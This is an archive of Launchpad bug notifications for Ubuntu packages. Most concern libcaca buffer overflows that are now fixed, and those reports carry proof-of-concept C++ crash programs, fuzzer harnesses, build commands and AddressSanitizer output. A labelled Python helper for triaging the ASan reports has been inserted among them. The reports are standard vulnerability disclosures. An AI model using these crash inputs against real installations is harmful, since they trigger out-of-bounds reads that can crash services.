[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

2022-06-13 Thread Fantu
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello ubuntu security team

  issues: https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  
  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <cstdint>   // system header names were lost in the archive;
  #include <cstdio>    // these are the ones this file needs

  using namespace std;

  // Hand the raw bytes to libcaca's "bin" importer.
  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"bin");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){
    size_t  len = 0;
    unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
    len = sizeof(buffer)/sizeof(unsigned char);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));  // size_t needs %zu
    crash((const uint8_t*)buffer,len);
    return 0;

  }
  4.compile poc_bin.cc

  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
  5.Run poc_bin
  asan info:

  =
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
  #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
  #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
  #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
  #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
  #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
  #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
  [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
    (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
    0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
    0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:   00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:   fa
    Freed heap region:   fd
    Stack left redzone:  f1
    Stack mid redzone:   f2
    Stack right redzone: f3
    Stack after return:  f5
    Stack use after scope:   f8
    Global redzone:  f9
    Global init order:   f6
    Poisoned by user:f7
    Container overflow:  fc
    Array cookie:ac
    Intra object redzone:bb
    ASan internal:   fe
    Left alloca redzone: ca
    Right alloca redzone:cb
    Shadow gap:  cc
  ==3817476==ABORTING

  Thanks

To manage notifications about this bug go to:

[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

2022-06-13 Thread Fantu
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello ubuntu security team

  issues: https://github.com/cacalabs/libcaca/issues/55

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <cstdint>   // system header names were lost in the archive;
  #include <cstdio>    // these are the ones this file needs

  using namespace std;

  // Hand the raw bytes to libcaca's "ansi" importer.
  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"ansi");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){

    size_t  len = 0;
    unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
    len = sizeof(buffer)/sizeof(unsigned char);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));  // size_t needs %zu
    crash((const uint8_t*)buffer,len);

    return 0;

  }
  4.compile poc_ansi.cc

  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi
  5.Run poc_ansi
  asan info:

  =
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
  #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38
  #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
  #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
  #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
  #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
  #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
  [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
    (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
    0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
    0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
    0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
    0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:   00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:   fa
    Freed heap region:   fd
    Stack left redzone:  f1
    Stack mid redzone:   f2
    Stack right redzone: f3
    Stack after return:  f5
    Stack use after scope:   f8
    Global redzone:  f9
    Global init order:   f6
    Poisoned by user:f7
    Container overflow:  fc
    Array cookie:ac
    Intra object redzone:bb
    ASan internal:   fe
    Left alloca redzone: ca
    Right alloca redzone:cb
    Shadow gap:  cc
  ==3763372==ABORTING
  Thanks

To manage notifications about this bug go to:
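
A triage helper for the two ASan stack reports quoted in the messages above (bugs 1925468 and 1925467), added here as an example; it is not part of either bug report or of libcaca. The names `triage`, `REPORT_BIN` and `REPORT_ANSI` are hypothetical, and the sample strings are constructed from the key lines of those reports.

```python
import re

# Constructed samples: key lines of the two ASan reports, including the hard
# line wraps that a mail archive introduces.
REPORT_BIN = """\
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
"""
REPORT_ANSI = """\
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
#0 0x7f098d82c30f in _import_ansi
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
[32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this
variable
"""

def triage(report):
    """Summarise an ASan stack report; return None if a field is missing."""
    text = " ".join(report.split())  # undo line wrapping before matching
    head = re.search(r"AddressSanitizer: ([\w-]+) on address", text)
    access = re.search(r"\b(READ|WRITE) of size (\d+)", text)
    frame0 = re.search(r"#0 0x[0-9a-f]+ in (\S+) (\S+)", text)
    obj = re.search(
        r"\[(\d+), (\d+)\) '([^']+)' \(line \d+\) <== Memory access at "
        r"offset (\d+) (?:partially )?(overflows|underflows) this variable",
        text)
    if not (head and access and frame0 and obj):
        return None
    lo, hi, offset = int(obj[1]), int(obj[2]), int(obj[4])
    size = int(access[2])
    return {
        "bug": head[1],
        "access": access[1],
        "function": frame0[1],       # innermost frame: where the access happened
        "location": frame0[2],
        "object": obj[3],
        "direction": obj[5],
        "object_len": hi - lo,       # frame offsets are [lo, hi)
        "index": offset - lo,        # index of the access inside the object
        # For an overflow: how many bytes of the access lie beyond the object.
        "bytes_past_end": offset + size - hi,
    }

if __name__ == "__main__":
    for rep in (REPORT_BIN, REPORT_ANSI):
        print(triage(rep))
```

In both reports `index` equals `object_len` and the access is a 1-byte READ, so each importer read exactly the first byte after the caller's buffer.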

[Touch-packages] [Bug 1229282] Re: libcaca ftbfs in saucy (pdftex errors)

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1229282

Title:
  libcaca ftbfs in saucy (pdftex errors)

Status in libcaca package in Ubuntu:
  Fix Released
Status in libcaca package in Debian:
  Fix Released

Bug description:
  ! Missing number, treated as zero.
   
 \relax 
  l.9 \-
\_\-\-\_\-extern char const $\ast$const $\ast$ 
\hyperlink{group__caca_...
  A number should have been here; I inserted `0'.
  (If you can't figure out why I needed to see a number,
  look up `weird error' in the index to The TeXbook.)

  ! Illegal unit of measure (pt inserted).
   
 \relax 
  l.9 \-
\_\-\-\_\-extern char const $\ast$const $\astmake[3]: *** [stamp-latex] Error 1
  make[3]: Leaving directory `/build/buildd/libcaca-0.99.beta18/doc'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make[1]: *** [all] Error 2
  make[1]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make: *** [build-arch-stamp] Error 2
  dpkg-buildpackage: error: debian/rules build gave error exit status 2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1229282/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu Security Team
  I use libFuzzer to test the libcaca API. I found two crashes

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

  -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c

  -> caca_export_memory() in libcaca/caca/codec/export.c

  -> export_tga() in libcaca/caca/codec/export.c

  -> export_troff() in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make
  ```

  3.Run POC.sh to compile poc_troff.cc, poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <cstdint>   // system header names were lost in the archive;
  #include <cstdio>    // these are the ones this file needs
  #include <cstdlib>
  #include <cstring>

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

    if(Size<8) return 0;
    size_t len=0;
    // NUL-terminated copy of the input, so strlen() below stays in bounds
    char* buffer = (char*)malloc(Size+1);
    memset(buffer,0,Size);
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // The third argument was missing in the archived text; the API takes a
    // size_t* that receives the exported size.
    void* reData = caca_export_canvas_to_memory(cv,"troff",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    cv=NULL;
    free(buffer);
    buffer=NULL;
    return 0;

  }

  
  int main(int args,char* argv[]){

    size_t  len = 0;
    unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
    len = sizeof(buffer)/sizeof(unsigned char);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));  // size_t needs %zu

    return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include <cstdint>   // system header names were lost in the archive;
  #include <cstdio>    // these are the ones this file needs
  #include <cstdlib>
  #include <cstring>

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

    if(Size<8) return 0;
    size_t len=0;
    // NUL-terminated copy of the input, so strlen() below stays in bounds
    char* buffer = (char*)malloc(Size+1);
    memset(buffer,0,Size);
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // The third argument was missing in the archived text; the API takes a
    // size_t* that receives the exported size.
    void* reData = caca_export_canvas_to_memory(cv,"tga",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    cv=NULL;
    free(buffer);
    buffer=NULL;
    return 0;
  }

  int main(int args,char* argv[]){

    size_t  len = 0;
    unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
    len = sizeof(buffer)/sizeof(unsigned char);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));  // size_t needs %zu

    return 0;
  }
  EOF
  ```


[Touch-packages] [Bug 1789022] Re: libcaca0 still depends on old libncursesw5 and libtinfo5

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1789022

Title:
  libcaca0 still depends on old libncursesw5 and libtinfo5

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Ubuntu Cosmic switched some time ago from ncurses5 to ncurses6.
  However, the package libcaca0 still depends on old libncursesw5 and libtinfo5 
instead of libncursesw6 and libtinfo6.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1789022/+subscriptions




[Touch-packages] [Bug 1910391] [NEW] Lightdm is not working on minimal DE install without recommends

2021-01-06 Thread Fantu
Public bug reported:

I tried to install Focal with a minimal DE, without installing recommends,
and installing lightdm. On Debian it works "out of the box"; on Ubuntu it
does not, lightdm fails to start. I saw that the issue is a missing greeter:
on Debian it is correctly among the dependencies, in the Ubuntu packages it
is instead among the recommends. Moving it from recommends to depends will
solve this.

** Affects: lightdm (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1910391

Title:
  Lightdm is not working on minimal DE install without recommends

Status in lightdm package in Ubuntu:
  New

Bug description:
  I tried to install Focal with a minimal DE, without installing recommends,
  and installing lightdm. On Debian it works "out of the box"; on Ubuntu it
  does not, lightdm fails to start. I saw that the issue is a missing
  greeter: on Debian it is correctly among the dependencies, in the Ubuntu
  packages it is instead among the recommends. Moving it from recommends to
  depends will solve this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1910391/+subscriptions



[Touch-packages] [Bug 1320422] Re: Please merge dbus 1.8.2-1 (main) from Debian testing (main)

2014-08-14 Thread Fantu
Updating dbus should also solve the latest cjs failure to build.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1320422

Title:
  Please merge dbus 1.8.2-1 (main) from Debian testing (main)

Status in “dbus” package in Ubuntu:
  In Progress

Bug description:
  I'm working on a debdiff to resync our dbus package with the current
  version in Debian testing.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1320422/+subscriptions
